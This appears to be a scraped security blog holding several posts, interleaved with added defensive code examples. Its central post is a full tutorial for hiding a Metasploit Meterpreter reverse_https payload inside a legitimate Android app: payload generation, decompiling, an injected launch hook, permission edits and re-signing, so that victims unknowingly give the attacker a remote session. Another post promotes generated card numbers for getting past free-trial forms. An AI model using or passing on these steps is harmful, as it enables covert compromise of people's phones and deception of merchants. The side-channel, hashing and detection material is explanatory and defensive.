Wednesday, December 26, 2018

Get Unlimited Free Trials Using a "Real" Fake Credit Card Number

When I see the words "free trial," I know I'm probably going to have to whip out my credit card and enter in the number to "not get charged." Then I end up forgetting about the trial and want to kick myself in the ass when I see my statement at the end of the month.

In order to avoid that rigmarole, you can actually use fake credit card numbers instead of your own, and you can do that using the site getcreditcardnumbers.com, which can generate up to 9,999 credit card numbers at a time, or just one.

Now, to be completely clear, these numbers cannot be used to purchase any item. Nada. Zilch. Nothing. For that to work, you would need a valid expiration date and CVV or CSV number. This site merely provides the standard 16-digit credit card number that can be used to bypass certain online forms that only ask for the number.

How Does It Work?
The credit card number generator uses a system based on the Luhn Algorithm, which has been used to validate numbers for decades. You can learn more about the algorithm on their webpage, or check out the Null Byte guide on how credit card algorithms work. A fake number will work for sites that store credit card information to either charge you later or ask you to upgrade.

For sites that ask for an upfront fee or have an automatic charge sometime down the line (Hulu Plus, Netflix, Spotify), this won't work since they ask for more than just a credit card number for validation. You can, however, get unlimited free trials on those sites using a simple trick with your email address if you have a valid card number with expiration date and CSV.

Getting a Card Number on Android
There's also an Android application for getting fake card numbers called CardGen, available for free in the Play Store. You can generate and validate credit card numbers directly from the app, making it easy to use on the go as well. Validation in particular would be useful if you were accepting credit card payments on your own site and wanted to make sure the cards were legit.
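To show what the Luhn check actually proves (and what it doesn't), here is an added example of the validation side mentioned above; it is not code from the original post, getcreditcardnumbers.com or CardGen. A form that only runs this check will accept any well-formed number, which is exactly why generated numbers get past it; only an authorization by the payment processor says whether an account exists and is funded.

```python
"""Luhn (mod 10) validation for a card-number input field.
Added example, not from the original post. Sample numbers in the
usage block are constructed/test numbers, not real accounts."""


def luhn_checksum_valid(number: str) -> bool:
    """Return True if the digit string passes the Luhn check.

    Spaces and dashes are tolerated as separators; any other non-digit
    character, or fewer than two digits, fails the check.
    """
    chars = [c for c in number if c not in " -"]
    if len(chars) < 2 or not all(c.isdigit() for c in chars):
        return False
    digits = [int(c) for c in chars]
    total = 0
    # Walk from the rightmost digit; double every second digit and
    # subtract 9 from any doubled value above 9 (same as summing its digits).
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def card_number_issues(number: str) -> list[str]:
    """List form-validation problems for a card-number field.

    An empty list means only that the digits are well formed. It says
    nothing about whether the account exists or is funded; that needs an
    authorization from the payment processor (the expiry/CVV checks the
    post mentions happen there, not here).
    """
    issues = []
    digits = "".join(c for c in number if c.isdigit())
    stripped = number.replace(" ", "").replace("-", "")
    if stripped != digits:
        issues.append("contains non-digit characters")
    if not 13 <= len(digits) <= 19:          # card PANs are 13 to 19 digits
        issues.append("length must be 13 to 19 digits")
    if digits and not luhn_checksum_valid(digits):
        issues.append("Luhn check digit does not match")
    return issues


if __name__ == "__main__":
    # Constructed inputs: a well-known Visa test number and two broken ones.
    for sample in ("4111 1111 1111 1111", "4111111111111112", "1234"):
        print(sample, "->", card_number_issues(sample) or "well formed")
```

The check digit is the last digit, so a single mistyped digit or most transposed neighbours will fail it; that is what the algorithm was designed to catch, and it is the reason a merchant site can use it only as a front-end sanity check before calling the processor.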

The app is ad-supported, but since it's free, I can live with that. In the generate field you can select from most of the major credit card providers, including American Express, Mastercard, Visa, and Discover. The disclaimer explains what the app does and how you should use it.


What would you do with these credit card number generators? Let us know in the comments section.

Embed a Metasploit Payload in an Original .apk File

Metasploit's flagship product, the Meterpreter, is very powerful and an all-purpose payload. Once installed on the victim machine, we can do whatever we want to their system by sending out commands to it. For example, we could grab sensitive data out of the compromised system.

The Meterpreter payload also comes as an installable .apk file for Android systems. Great! Now we can use Metasploit to compromise Android phones also. But if you have tried out these payloads you would know that they do not look convincing. No one in their right mind is going to install and run such an app, which apparently does nothing when it is opened. So how are we going to make the victim run the payload app in their phone?

One of the solutions is that you can embed the payload inside another legitimate app. The app will look and behave exactly as the original one, so the victim won't even know that his system is compromised. That's what we are going to do in this tutorial.

NOTE – This is a follow-up to my previous post, in which I showed you how to do this using a very simple yet effective Ruby script. If you haven't read it, check it out. If you are not willing to go down the hard path, you can use that method to do it just fine. But if you want to know the inner workings and have a greater understanding, continue reading this post. Also, in the following Android hacking tutorials I may refer back to this one, so if you can, I suggest you keep on reading.

PREREQUISITES:

This tutorial is based on the Kali Linux operating system. I'm sure it can be done on other OSes, especially Linux distros, but that will involve some more complications, so I'm not going to cover those. If you are serious about hacking or penetration testing, you should use Kali, as it was built specifically for pen-testing.

We will also need some libraries and tools in the following steps, so I think it's better if you install them right now.

To install the required libraries, enter this command at the console:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

And to get the latest version of ApkTool, head over to this site and follow the installation instructions.

Also download the apk which you want to be backdoor-ed from any source you like. Just do a google search "app_name apk download" and Google will come up with a lot of results. Save that apk in the root folder.

BRIEF OVERVIEW:
Since this tutorial is a little bit long, I'm giving a brief overview of what we are going to do here.

1. Generate the Meterpreter payload
2. Decompile the payload and the original apk
3. Copy the payload files to the original apk
4. Inject the hook into the appropriate activity of the original apk
5. Inject the permissions in the AndroidManifest.xml file
6. Re-compile the original apk
7. Sign the apk using Jarsigner

That's about it. I will also show you how can you get a working Meterpreter session using that backdoored apk, if you don't know that already. So let's get started.

Step 1: GENERATE the PAYLOAD:

First of all, we have to make the Meterpreter payload. We are going to use MSFVenom for this. The command is-

msfvenom -p android/meterpreter/Payload_Type LHOST=IP_Address LPORT=Incoming_Port -o meterpreter.apk

Replace Payload_Type with any of the following available payloads. The function of all these payloads is the same; essentially they are all Meterpreter payloads, and the only difference is the method they use to connect back to your Kali system. The available Payload_Types are –

1. reverse_tcp
2. reverse_http
3. reverse_https

You can use any one you like, I'm going to use reverse_https as an example.

Replace IP_Address by the IP address to which the payload is going to connect back to, i.e the IP address of the attacker's system. If you are going to perform this attack over a local network (eg. if the victim and attacker are connected to the same WiFi hotspot), your Local IP will suffice. To know what your local IP is, run the command – ifconfig 

If you are going to perform this attack over the Internet, you have to use your public IP address, and configure your router properly (set up port forwarding) so that your system is accessible from the Internet. To know your public IP, just google "My IP" and Google will help you out.

Replace Incoming_Port with the port no. which you want to be used by the payload to connect to your system. This can be any valid port except the reserved ones like port 80 (HTTP). I'm going to use 4895 as an example.


So run the command, replacing the keywords with appropriate values, and MSFVenom will generate a payload "meterpreter.apk" in the root directory. Note that we specified the output file name using the "-o meterpreter.apk" argument in the command, so if you like, you can name it anything else as well.

Step 2: DECOMPILE the APKs:

Now we have to decompile the APKs, for this we are going to use APKTool. It decompiles the code to a fairly human-readable format and saves it in .smali files, and also successfully extracts the .xml files. Assuming you have already installed the latest apktool and also have the original apk file in the root directory, run the following commands –

apktool d -f -o payload /root/meterpreter.apk

apktool d -f -o original /root/Original_APK_Name

It will decompile the payload to "/root/payload" and the original apk to "/root/original" directory.


Step 3: COPY the PAYLOAD FILES:

Now we have to copy the payload files to the original app's folder. Just go to "/root/payload/smali/com/metasploit/stage" and copy all the .smali files whose file name contains the word 'payload'. Now paste them in "/root/original/smali/com/metasploit/stage". Note that this folder does not exist, so you have to create it.

Step 4: INJECT the HOOK in the ORIGINAL .SMALI CODE:

In the previous step, we just copied the payload code inside the original apk, so that when the original apk is recompiled, it will contain the payload. But that doesn't necessarily mean that the payload will run. To ensure that the payload runs, we have to inject a hook into the original apk's .smali code. If you are wondering what this hook thingy I'm talking about is, well, essentially it's code which intercepts some specific function call and reacts to it. In this case, we are going to place the hook so that when the app is launched, it will also launch the payload with it.

For this, we first have to find out which activity is run when the app is launched (to put it simply, activities are sections of code, similar to frames in Windows programming). We can get this info from the AndroidManifest.xml file.

So open up the AndroidManifest.xml file located inside the "/root/original" folder using any text editor. If you know HTML, then this file will look familiar to you. Both of them are essentially Markup Languages, and both use the familiar tags and attributes structure e.g. <tag attribute="value"> Content </tag>. Anyway, look for an <activity> tag which contains both the lines –

<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>

On a side note, you can use CTRL+F to search within the document in any GUI text editor. When you locate that activity, note its "android:name" attribute's value. In my case, as you can see from the screenshot below, it is "com.piriform.ccleaner.ui.activity.MainActivity".


Those two lines we searched for signify that this is the activity which is going to start when we launch the app from the launcher icon, and also that this is a MAIN activity, similar to the 'main' function in traditional programming.

Now that we have the name of the activity we want to inject the hook into, let's get to it! First of all, open the .smali code of that activity using gedit. Just open a terminal and type –

gedit /root/original/smali/Activity_Path

Replace Activity_Path with the activity's "android:name", but with slashes instead of the dots. The smali code is actually stored in folders named in the same format as the "android:name", so we can easily get the location of the .smali file this way. Check the screenshot below and you will get an idea of what I'm trying to say.


Now search for the following line in the smali code using CTRL+F –

;->onCreate(Landroid/os/Bundle;)V

When you locate it, paste the following code in the line next to it –

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

What we are doing here is inserting code which starts the payload alongside the existing code that is executed when the activity starts. Now, save the edited smali file.
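From the defender's side, steps 3 and 4 leave two very recognisable traces in a decompiled app: the copied com/metasploit/stage classes and the start() call sitting in the launcher activity's onCreate. Here is an added example (not from the original post or from Metasploit/apktool) that scans an apktool output directory for exactly those indicators; the SAMPLE_TREE dict is a constructed stand-in for such a directory, and the package/activity names in it are made up.

```python
"""Indicators that a Metasploit stage was spliced into a decompiled APK.
Added example, not from the original post. Point it at an apktool output
directory; SAMPLE_TREE is a constructed stand-in for one."""
import os
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
STAGE_DIR = "smali/com/metasploit/stage/"                  # where step 3 drops the stage
HOOK_RE = re.compile(r"Lcom/metasploit/stage/Payload;->start\(")   # the step 4 hook
ONCREATE_RE = re.compile(r"\.method .*onCreate\(Landroid/os/Bundle;\)V")


def load_tree(root):
    """Read every .smali and .xml file under root into {relative_path: text}."""
    tree = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith((".smali", ".xml")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    rel = os.path.relpath(path, root).replace(os.sep, "/")
                    tree[rel] = fh.read()
    return tree


def launcher_activities(manifest_xml):
    """Fully qualified names of activities carrying MAIN + LAUNCHER,
    i.e. the activity the post picks as the hook location."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    names = []
    for act in root.iter("activity"):
        name = act.get(ANDROID_NS + "name", "")
        if name.startswith("."):            # relative names are package-prefixed
            name = package + name
        for filt in act.iter("intent-filter"):
            actions = {a.get(ANDROID_NS + "name") for a in filt.iter("action")}
            cats = {c.get(ANDROID_NS + "name") for c in filt.iter("category")}
            if ("android.intent.action.MAIN" in actions
                    and "android.intent.category.LAUNCHER" in cats):
                names.append(name)
    return names


def find_indicators(tree):
    """Return human-readable findings; an empty list means nothing matched."""
    findings = []
    stage_files = sorted(p for p in tree if p.startswith(STAGE_DIR))
    if stage_files:
        findings.append(f"{len(stage_files)} stage class file(s) under {STAGE_DIR}")
    for path, text in sorted(tree.items()):
        if path.endswith(".smali") and HOOK_RE.search(text):
            findings.append(f"stage start() invoked from {path}")
    manifest = tree.get("AndroidManifest.xml")
    if manifest:
        for name in launcher_activities(manifest):
            smali = tree.get("smali/" + name.replace(".", "/") + ".smali", "")
            if ONCREATE_RE.search(smali) and HOOK_RE.search(smali):
                findings.append(f"launcher activity {name} starts the stage in onCreate")
    return findings


# Constructed sample of a backdoored app after steps 3 and 4 (made-up names).
SAMPLE_TREE = {
    "AndroidManifest.xml": """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application>
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>""",
    "smali/com/example/notes/MainActivity.smali": """.class public Lcom/example/notes/MainActivity;
.method protected onCreate(Landroid/os/Bundle;)V
    .locals 1
    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
    return-void
.end method
""",
    "smali/com/metasploit/stage/Payload.smali": ".class public Lcom/metasploit/stage/Payload;\n",
}

if __name__ == "__main__":
    import sys
    tree = load_tree(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_TREE
    for finding in find_indicators(tree) or ["no indicators found"]:
        print(finding)
```

Run it as `python3 scan.py /root/original` after `apktool d`. The class path and hook signature are the ones this post uses, so a rebuilt stage with renamed classes would need different patterns; the launcher-activity check is the more durable part, since any injected start-up call still has to live in an onCreate reachable from the MAIN/LAUNCHER intent filter.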

Step 5: INJECT the NECESSARY PERMISSIONS:

From developer.android.com –

Additional finer-grained security features are provided through a "permission" mechanism that enforces restrictions on the specific operations that a particular process can perform.

If we do not declare all the additional permissions that our payload is going to need, it cannot function properly. While installing an app, these permissions are shown to the user. But most users don't care to read all that boring text, so we do not have to worry about that much.

These permissions are also listed in the AndroidManifest file we encountered earlier. So let's open the AndroidManifest.xml of both the original app and the payload from their respective folders. The permissions are declared in <uses-permission> tags as the 'android:name' attribute. Copy the additional permission lines from the payload's AndroidManifest to the original app's one, but be careful not to create any duplicates.

Here's my original app's AndroidManifest before editing –


After adding the additional ones from the Payload's AndroidManifest, my /root/original/AndroidManifest.xml looks like this –


Step 6: RECOMPILE the ORIGINAL APK:

Now the hard parts are all done! We just have to recompile the backdoored app into an installable apk. Run the following command –

apktool b /root/original


You will now have the compiled apk inside the "/root/original/dist" directory. But, we're still not done yet.

Step 7: SIGN the APK:

This is also a very important step, as in most cases an unsigned apk cannot be installed. From developer.android.com –

Android requires that all apps be digitally signed with a certificate before they can be installed. Android uses this certificate to identify the author of an app, and the certificate does not need to be signed by a certificate authority. Android apps often use self-signed certificates. The app developer holds the certificate's private key.

In this case we are going to sign the apk using the default android debug key. Just run the following command –

jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA apk_path androiddebugkey

Be sure to replace the apk_path in the above command with the path to your backdoored apk file.


PROFIT?!:

Now if you can get the victim to install and run this very legit-looking app in his phone, you can get a working meterpreter session on his phone!


If you face any difficulty, please let me know in the comments. Thanks for reading!


Monday, August 6, 2018

Side-channel attacks


What is a side-channel attack?

A side-channel attack is a form of reverse engineering. Electronic circuits are inherently leaky – they produce emissions as byproducts that make it possible for an attacker without access to the circuitry itself to deduce how the circuit works and what data it is processing. Heat and electromagnetic emissions are both viable sources of information for an attacker. Because these emissions do not play a part in the operation of the circuit itself – they are simply side effects of it working – the use of them to perform reverse engineering has earned the term 'side-channel analysis' or 'side-channel attack'. The difference between the two is largely one of intention.

How realistic is the risk?

The risk is, at the very least, costly to reputation. A number of security researchers actively use side-channel analysis to determine the vulnerability of commercial ICs. They will often pick as primary targets products that are sold as possessing high security, able to protect sensitive information or financial value, in order to demonstrate that they have unforeseen vulnerabilities. A recent example is the analysis of a Microsemi field-programmable gate array (FPGA) by researchers at the University of Cambridge, UK and private company Quo Vadis Labs. The researchers claimed their analysis demonstrated the existence of a backdoor to the FPGA's stored content. Microsemi denied that this was the case, arguing that the researchers had simply analysed a test function that could be disabled permanently by customers before deployment.

The year before, researchers at the Horst Görtz Institute for IT Security at Ruhr University in Bochum, Germany described how they cracked the AES-256 encryption that designers can use to protect the circuits downloaded into Xilinx's Virtex-4 and Virtex-5 FPGAs.

There is even an annual competition to determine who can crack a programmable logic-based AES implementation the fastest using side-channel analysis. The organizers claim the purpose is to help improve countermeasures to attacks on cryptographic functions.

Aside from the reputational risks to silicon vendors, there are risks to users of secure devices, as attackers may use side-channel analysis to reconstruct encryption keys and attack the system for financial gain or to gain access to secret data.

How does side-channel analysis work?

All attacks take advantage of the changes in processing behavior that will be exhibited at different times during algorithm execution. There are two broad classes of side-channel analysis: simple and differential. Within those classes, attackers can use a range of side-channel properties, such as heat generated, power consumed, or execution time. For embedded systems where the attacker has access to the hardware, heat and power represent the most important sources of leaks, although timing-based attacks are likely to become more important on multitasking and multiprocessor systems where the attacker is able to load their own code or use interactions between existing applications to track behavior.

For networked systems, time-based attacks are the most feasible and have been exploited. Systems that use memory caches are particularly vulnerable to timing-based attacks because of the significant difference in performance of a given section of code based on whether accesses to the cache hit or miss and force a slower read or write to main memory.

If an attacker is able to run their own code on the system, they can exploit timing-based attacks not just by observing the runtime of the target application but the timing of memory accesses of their own, as these will be affected by cache behavior. This can even be achieved on cloud servers. The attacker can force the cache into a particular state by running software that fills the lines in a predetermined way and also observe how the target application displaces their own data.

The group led by G Edward Suh at Cornell University has identified network-on-chip (NoC) and shared-memory controllers as vulnerable to timing-related side-channel attacks.

Similar to systems with caches, low end microcontrollers without dedicated encryption circuitry often take varying lengths of time to perform the computations needed to encrypt or decrypt data. Commonly used encryption systems employ a mixture of exponentiation – typically squaring – and multiplication, proceeding one bit at a time. As squaring can be achieved on a binary system using just shift operations, it takes many fewer cycles than the shift-and-add serial multiplication algorithm that will be used by low-end microcontrollers – so the attacker can look at the time it takes to process each instruction. If the microcontroller has a dedicated multiplier, this will consume more energy than the squaring operation, consuming more current and generating more heat and EMI.

In an algorithm such as RSA decryption, a multiplication will only be performed if the exponent bit being processed is 1. The attacker can simply measure changes in current to derive the key, one bit at a time.

Simple power analysis works for low integration ICs where there is little other on-chip activity to mask the behaviour of the target circuit. For this reason, simple power analysis is not generally very useful, although it has served to uncover the encryption keys processed by low-end microcontrollers.

Differential power analysis (DPA) is a statistical method that has proved devastatingly effective at uncovering sensitive information about target circuits even when other surrounding gates are actively switching. DPA involves the attacker making a hypothesis about the behaviour or state of the target circuit – a guess at part of a full encryption key, for example, on the basis that most systems work on keys in a series of, say, 8-bit chunks.

If the guess is correct, the emissions associated with the electrical activity inside the chip will be correlated. If not, the activity will be uncorrelated. Over a large number of guesses and measurements, the correlated results will separate out, providing the attacker with clues as to the key value. The more measurements are taken, the more the uncorrelated noise averages out.

The attack on the Microsemi ProASIC3 FPGAs involved a variant of DPA called pipeline emission analysis, developed by the sponsor of the research, Quo Vadis Labs.

Are there countermeasures?

A range of countermeasures can be used to defeat, or at least slow down, side-channel analysis. They concentrate mainly on the reduction of differences between leakage values – in which the operation sequences are made less dependent on key values or intermediates – and randomisation, where the order of operations on the data is constantly changing. The latter technique is generally better at defeating the correlation techniques used in DPA, as leakage mitigation can be overcome through the use of more measurements.

The techniques used for leakage mitigation include pre-charging registers and buses to prevent the generation of power-leakage signatures based on the change in bus values as data values are passed. Fixed-time algorithms that have no data-dependent delays can reduce the ability to detect data-related timing signatures. Performing more operations in parallel or even dummy operations will also reduce the attacker's effective signal-to-noise ratio.
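The square-and-multiply leak described earlier (a multiplication only when the exponent bit is 1) and the fixed-time countermeasure above can be made concrete with a small operation-trace model. This is an added example, not part of the original article: the "trace" is a list of operation names standing in for the per-instruction timing or power signature, not a measurement, and Python's big-integer arithmetic is itself not constant-time, so the point is the shape of the sequence, not real timing.

```python
"""Operation-trace model of the square-and-multiply leak and its fixed-sequence
countermeasure. Added example, not from the original article; the trace is a
stand-in for the timing/power signature, not a real measurement."""


def square_and_multiply(base, exponent, modulus):
    """Naive left-to-right binary exponentiation.

    Returns (result, trace). A multiply ('M') follows a square ('S') only
    where the exponent bit is 1, so the trace mirrors the key bits.
    """
    result = 1
    trace = []
    for bit in bin(exponent)[2:]:
        result = (result * result) % modulus
        trace.append("S")
        if bit == "1":
            result = (result * base) % modulus
            trace.append("M")
    return result, trace


def recover_exponent_from_trace(trace):
    """What the article's attacker does: read the key bits back off the
    operation sequence. Each 'S' starts a new bit; an 'M' right after it
    marks that bit as 1."""
    bits = []
    for op in trace:
        if op == "S":
            bits.append("0")
        elif op == "M":
            bits[-1] = "1"
    return int("".join(bits), 2)


def square_and_multiply_always(base, exponent, modulus, width):
    """Fixed operation sequence: every bit costs one square and one multiply.

    For a 0 bit the multiply result is computed and then discarded, so the
    trace depends only on `width` (the key length, assumed public), not on
    the key bits. The final select is still a Python branch; a real
    implementation would use a constant-time conditional move.
    """
    assert exponent.bit_length() <= width, "exponent does not fit in width"
    result = 1
    trace = []
    for i in range(width - 1, -1, -1):
        result = (result * result) % modulus
        trace.append("S")
        candidate = (result * base) % modulus   # dummy multiply when bit is 0
        trace.append("M")
        bit = (exponent >> i) & 1
        result = candidate if bit else result
    return result, trace


if __name__ == "__main__":
    # Constructed toy parameters; a 4-bit "key" keeps the traces readable.
    _, leaky = square_and_multiply(4, 13, 497)
    print("naive trace  :", "".join(leaky), "-> key", recover_exponent_from_trace(leaky))
    _, fixed = square_and_multiply_always(4, 13, 497, 4)
    _, fixed2 = square_and_multiply_always(4, 8, 497, 4)
    print("fixed trace  :", "".join(fixed), "(same for key 8:", fixed == fixed2, ")")
```

The first trace is literally the exponent in unary-ish form, which is the "one bit at a time" recovery the article describes. The second trace is identical for every key of the same width, which is what the leakage-mitigation class of countermeasures buys; it does not remove data-dependent power differences inside each multiply, which is why the article pairs it with randomisation and noise.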

Companies such as Cryptography Research (CRI) have patented side-channel countermeasures that can be licensed by OEMs. Others, such as ESCRYPT have developed IP cores that they claim to be far more resistant to side-channel analysis than conventional designs.

At the 22nd Usenix Security Symposium in 2013, researchers from the IMDEA Software Institute and Saarland University presented an auditing tool – CacheAudit – for caches to demonstrate how effectively countermeasures such as preloading could mitigate cache-oriented timing-based attacks.

Boris Köpf and colleagues from IMDEA have also developed techniques to quantify the upper bounds on the amount of information that may be leaked by a particular cache implementation for a given program using the AbsInt Timing Explorer tool.

In general, the team has observed that larger caches increase information leakage because they improve the resolution of data that the attacker can obtain. Conversely, longer line sizes reduce leakage.

Friday, July 27, 2018

What is a Hash Function?

A cryptographic hash function is a hash function which takes an input (or ‘message’) and returns a fixed-size alphanumeric string. The string is called the ‘hash value’, ‘message digest’, ‘digital fingerprint’, ‘digest’ or ‘checksum’.

The diagram above explains hashing: we have the text “abc123” and, after applying a hash function (SHA-1), we get a fixed-size alphanumeric output which we call the hash value. From this hash value we cannot get back our original input text.

Fundamentals of Hashing
Hash functions are one-way: we cannot reverse a hash value to find the original content (they are irreversible).
If we pass the same content through the same hash function, it should always produce the same output, i.e. the same hash value.
Imagine a scenario of storing passwords in software systems…

If we store passwords in plain text, anyone who has access to the database can view all passwords and can even log in to the system using someone else’s credentials. To overcome this we can use hashing.

Instead of saving the plain text password, we can hash the password using a hashing function (h1) and store the hash value.

When a user tries to log in to the system, the password the user enters is hashed using the same hash function (h1) and checked against the hash value stored in the table. If both hash values are equal, we can allow the user to log in to the system.

In the above table john and sam have the same password “abc123”, and after applying the hash function both of them get the same hash value. Imagine john has access to the database and can view the hashed passwords. John can notice that his password hash and sam’s password hash are the same, so john will be able to log in to the system using sam’s credentials. To overcome this we can apply the technique called salting.

Salted Hashing
In salted hashing, our goal is to make the hash value of each password unique. For that the system generates a random set of characters called a salt. When the user enters the plain text password, the generated random characters are appended to it. Then we send the appended text to the hashing function and get the hash value (the salted hash). In this case, we have to store the salt value for each user.

In the above table, even though john and sam have the same password, their hash values are different.

In the login process the system gets the salt value for the relevant user from the database, appends it to the input password, passes the result through the hashing function and checks the resulting hash value against the stored hash value in the table. If both hash values match, the user is authenticated.

Hash Collision
If two different inputs have the same hash value, it is called a collision. Since hash functions accept inputs of unbounded length but have a predefined output length, it is possible for two different inputs to produce the same hash value.

Here is an example of two files with different content, yet the same SHA-1 value. A team of researchers from CWI (Centrum Wiskunde & Informatica) and Google managed to alter a PDF without changing its SHA-1 hash value.

http://shattered.io/

SHA-512 produces hashes that are longer than those produced by MD5, so it’s harder to find collision opportunities.

See the difference for yourself:

input text : “password”

MD5:
5f4dcc3b5aa765d61d8327deb882cf99
SHA-1:
5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
SHA-256:  5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8
SHA-512:  b109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d7785e5976ec049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86
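The salted-hash flow above (register, store salt plus hash, recompute on login) and the digest table can both be reproduced with the standard library. This is an added example, not code from the original post; the user table is a constructed in-memory dict, and the algorithm names are hashlib's.

```python
"""Salted password storage as the post describes, plus a helper that
reproduces the digest table. Added example, not from the original post;
USERS is a constructed in-memory stand-in for the database table."""
import hashlib
import hmac
import os


def plain_hash(text, algorithm="sha256"):
    """Unsalted digest (hex). Same input gives the same output for every user,
    which is the john/sam problem described above."""
    return hashlib.new(algorithm, text.encode("utf-8")).hexdigest()


def salted_hash(password, salt):
    """Digest of password || salt, the salt appended as the post describes."""
    return hashlib.sha256(password.encode("utf-8") + salt).hexdigest()


USERS = {}   # constructed "table": username -> (salt_hex, salted_hash_hex)


def register(username, password):
    """Store a fresh random salt per user alongside the salted hash."""
    salt = os.urandom(16)
    USERS[username] = (salt.hex(), salted_hash(password, salt))


def login(username, password):
    """Recompute with the user's stored salt and compare in constant time."""
    record = USERS.get(username)
    if record is None:
        return False
    salt_hex, stored = record
    computed = salted_hash(password, bytes.fromhex(salt_hex))
    return hmac.compare_digest(computed, stored)


if __name__ == "__main__":
    register("john", "abc123")
    register("sam", "abc123")
    print("unsalted equal :", plain_hash("abc123") == plain_hash("abc123"))
    print("salted equal   :", USERS["john"][1] == USERS["sam"][1])
    print("john logs in   :", login("john", "abc123"))
    print("wrong password :", login("john", "abc124"))
    for algo in ("md5", "sha1", "sha256", "sha512"):
        print(f"{algo:7}:", plain_hash("password", algo))
```

For a real system, keep this salting logic but replace the single SHA-256 call with a deliberately slow password hash such as PBKDF2 (`hashlib.pbkdf2_hmac`) so that an attacker who obtains the table cannot test guesses cheaply; the salt stops equal passwords from matching, the slow hash stops bulk guessing.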

Applications of Hashing
For password storage and authentication.
We have discussed this scenario above.

Integrity Protection.


Bob wants to send a message to Alice, but there is this middle man Darth who can modify the message from Bob to Alice. So, how can Alice verify that she receives the original message sent by Bob and it is not modified by someone during the communication?

What Bob can do is, after writing the message he can calculate the hash value of the message and send it along with the message. When Alice receives the message, she can again calculate the hash value for the message from the same hashing function used by Bob and check it with the hash value she received from Bob. If both hash values are equal Alice can verify that the message is not modified.
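The Bob/Alice/Darth exchange in code, as an added example that is not part of the original post. It also goes one step beyond the text: a plain digest sent next to the message catches corruption, but Darth, who can modify the message, can just as easily recompute the digest for his modified version, so the second half uses an HMAC with a key shared by Bob and Alice (the key and messages below are constructed).

```python
"""Integrity check with a bare digest versus a keyed MAC.
Added example, not from the original post; names, key and messages are
constructed for illustration."""
import hashlib
import hmac


def send_with_digest(message: bytes):
    """Bob's scheme as described: message plus its SHA-256 digest."""
    return message, hashlib.sha256(message).hexdigest()


def verify_digest(message: bytes, digest: str) -> bool:
    """Alice recomputes the digest and compares (constant time)."""
    return hmac.compare_digest(hashlib.sha256(message).hexdigest(), digest)


def darth_corrupts(message: bytes, digest: str):
    """Modification that leaves the digest untouched: this is caught."""
    return message.replace(b"100", b"900"), digest


def darth_rewrites(message: bytes, digest: str):
    """Modification where Darth also recomputes the digest: not caught,
    because the digest needs no secret."""
    return send_with_digest(message.replace(b"100", b"900"))


def send_with_mac(key: bytes, message: bytes):
    """Keyed variant: HMAC-SHA256 over the message with a key Darth lacks."""
    return message, hmac.new(key, message, hashlib.sha256).hexdigest()


def verify_mac(key: bytes, message: bytes, tag: str) -> bool:
    return hmac.compare_digest(hmac.new(key, message, hashlib.sha256).hexdigest(), tag)


if __name__ == "__main__":
    msg = b"Bob to Alice: please pay 100"
    m, d = send_with_digest(msg)
    print("untouched      :", verify_digest(m, d))
    print("corrupted      :", verify_digest(*darth_corrupts(m, d)))
    print("rewritten      :", verify_digest(*darth_rewrites(m, d)))  # still True
    shared = b"constructed-shared-key"
    m2, tag = send_with_mac(shared, msg)
    forged = m2.replace(b"100", b"900")
    print("forged with MAC:", verify_mac(shared, forged, tag))          # False
```

The digest alone therefore proves integrity only against accidental change or against an attacker who cannot replace the digest (for example, when the hash is published on a separate, trusted channel, as with download checksums); when the same channel carries both, authenticity needs a key, which is what the HMAC provides.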

SSL Certificate Validation
HTTPS is shown in the browser’s URL bar to indicate a secure connection while accessing secure websites. In the SSL/TLS handshake, when the client says hello, the server sends its public key along with a certificate that asserts the public key belongs to the server. If it’s a website (google.com), the certificate will contain the domain name of the website. Basically the certificate says something like: the public key (sent along with the certificate) belongs to google.com. So how do you check the validity of this certificate? That’s where hashing comes into play.

Here is the certificate of google.com. You can see the hash value of google.com certificate under Fingerprints section.


What basically happens is, your browser downloads the web server’s certificate, calculates the hash value of the certificate itself, then compares it with the hash value in the certificate. If both of these hash values are equal, the certificate is verified.

Thursday, May 10, 2018

Secrets of Existence



Question 1 : What is dark matter?

All the ordinary matter we can find accounts for only about 4 percent of the universe. We know this by calculating how much mass would be needed to hold galaxies together and cause them to move about the way they do when they gather in large clusters. Another way to weigh the unseen matter is to look at how gravity bends the light from distant objects. Every measure tells astronomers that most of the universe is invisible. 

It's tempting to say that the universe must be full of dark clouds of dust or dead stars and be done with it, but there are persuasive arguments that this is not the case. First, although there are ways to spot even the darkest forms of matter, almost every attempt to find missing clouds and stars has failed. Second, and more convincing, cosmologists can make very precise calculations of the nuclear reactions that occurred right after the Big Bang and compare the expected results with the actual composition of the universe. Those calculations show that the total amount of ordinary matter, composed of familiar protons and neutrons, is much less than the total mass of the universe. Whatever the rest is, it isn't like the stuff of which we're made. 

The quest to find the missing universe is one of the key efforts that has brought cosmologists and particle physicists together. The leading dark-matter candidates are neutrinos or two other kinds of particles: neutralinos and axions, predicted by some physics theories but never detected. All three of these particles are thought to be electrically neutral, thus unable to absorb or reflect light, yet stable enough to have survived from the earliest moments after the Big Bang. 


Question 2 : What is dark energy?

